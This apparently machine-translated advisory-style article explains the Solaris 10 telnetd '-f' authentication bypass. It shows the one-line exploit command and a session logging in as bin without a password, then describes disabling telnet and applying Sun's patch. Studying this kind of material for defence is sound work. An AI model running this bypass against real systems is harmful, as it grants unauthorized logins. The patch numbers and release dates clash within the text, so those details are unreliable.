Telnet security issues have always been our key concern. So today we will discuss the content of the telnet security vulnerability. Let's take a look at the basic information about the telnet security vulnerability. Early versions of Solaris 2.6, 7, and 8 have a telnetd Vulnerability. You can bypass the verification using the environment variable TTYPROMPT of/bin/login. As a result, you can log on without authentication. Recently, telnet on Solaris 10 was found to have a vulnerability, and Sun also released a patch in time.
Let's first look at the symptoms of the problem. The system environment where the vulnerability occurs is Solaris 10 or later. The default installation is not selected during installation. The vulnerability occurs when you specify any "-fusername" parameter after the-l option of the Solaris telnet command, you can directly log on to the Solaris system.
Command Format:
- telnet -l "-fbin" target_address
The following is a demonstration of using the telnet security vulnerability to log on to the system as a bin user.
- # telnet -l "-fbin" myhost
- Trying 172.21.60.120...
- Connected to myhost.
- Escape character is '^]'.
- Sun Microsystems Inc. SunOS 5.10 Generic January 2005
- $ id -a
- uid=2(bin) gid=2(bin) groups=2(bin),3(sys)
If the Administrator modifies the/etc/default/login file and comment out the CONSOLE line to allow root remote logon, the visitor can use this vulnerability to directly log on to the system as root, this poses greater harm to the system.
Kingsley first provided the source code of the vulnerability found in OpenSolaris and called it a "0-day"-zero-day vulnerability. Article address: http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf
A script is provided in this Article. After running the script, the user can obtain the adm user permission of the logged-on system.
Solution:
1. disable the telnet service for Solaris 10.
Check whether the local telnet service is enabled.
- # svccfg list | grep telnet
- network/telnet
- # svcs -l network/telnet
- fmri svc:/network/telnet:default
- name Telnet server
- enabled true
- stateonline
- next_state none
- state_time Mon Feb 26 03:50:13 2007
- restartersvc:/network/inetd:default
Disable the telnet service.
- # svcadm disable svc:/network/telnet:default
2. download and install the Sun Security Patch, which must be supported by the Sun service ).
Sun's Technical Support Engineer Alan Hargreaves's February 13 BLOG: http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit
As mentioned in, the final patch for solving this problem has been released on August 3. You can use the Update Manager of Solaris 10 to download and install the patch ,. The patch was released on July 15, February 21.
It should be noted that the Solaris 10 patch can be downloaded free of charge in addition to the Security and hardware patches, and all the other services must support the Sun Service Plan. However, if you know the Patch number, you can download it from a single http://sunsolve.sun.com. Here, you can use PatchFinder on sunsolve to find and download the 12768-03 patch and install it in the system.
System vulnerabilities are forbidden after patches are installed.
- # showrev -p | grep 120068
- Patch: 120068-01 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd
- Patch: 120068-03 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd
- # telnet -l "-fbin" myhost
- Trying 172.21.60.120...
- Connected to myhost.
- Escape character is '^]'.
- Password:
You need to enter a password to log on. The current telnet security vulnerability in the Solaris 10 system has been fixed.
Sun responded quickly to the newly discovered telnet security vulnerability of Solaris 10 and immediately launched the corresponding patch. We can also see that any operating system has bugs. Sun uses OpenSolaris open-source to enable the system Bug to be discovered and improved as soon as possible.